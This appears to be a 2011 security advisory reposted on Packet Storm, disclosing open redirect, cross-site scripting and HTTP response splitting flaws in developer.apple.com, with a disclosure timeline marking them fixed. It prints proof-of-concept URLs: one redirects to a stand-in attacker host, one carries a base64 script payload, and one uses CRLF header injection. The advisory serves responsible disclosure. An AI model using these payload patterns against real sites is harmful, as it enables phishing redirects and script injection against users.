what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apple Developer Cross Site Scripting / Redirect

Apple Developer Cross Site Scripting / Redirect
Posted Jul 1, 2011
Authored by Aung Khant | Site yehg.net

The Apple Developer site suffered from open redirect, cross site scripting, and http response splitting vulnerabilities.

tags | exploit, web, vulnerability, xss
systems | apple
SHA-256 | b29d8484d309dd75a2e3e792db03ef437624b98406e3757be16dee53f7a81233
Download | Favorite | View

Apple Developer Cross Site Scripting / Redirect

Change Mirror Download
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
======================

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 -  http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting(XSS) Via Arbitrary URL Redirect
====================================================

POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting(HRS) Via Arbitrary URL Redirect
========================================================

https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported vendor
2011-04-27: vendor replied "Thank you for forwarding this issue to us.
We take any report of a potential security issue
very seriously."
2011-06-29: vendor replied vulnerability was fixed
2011-07-01: vulnerability was disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close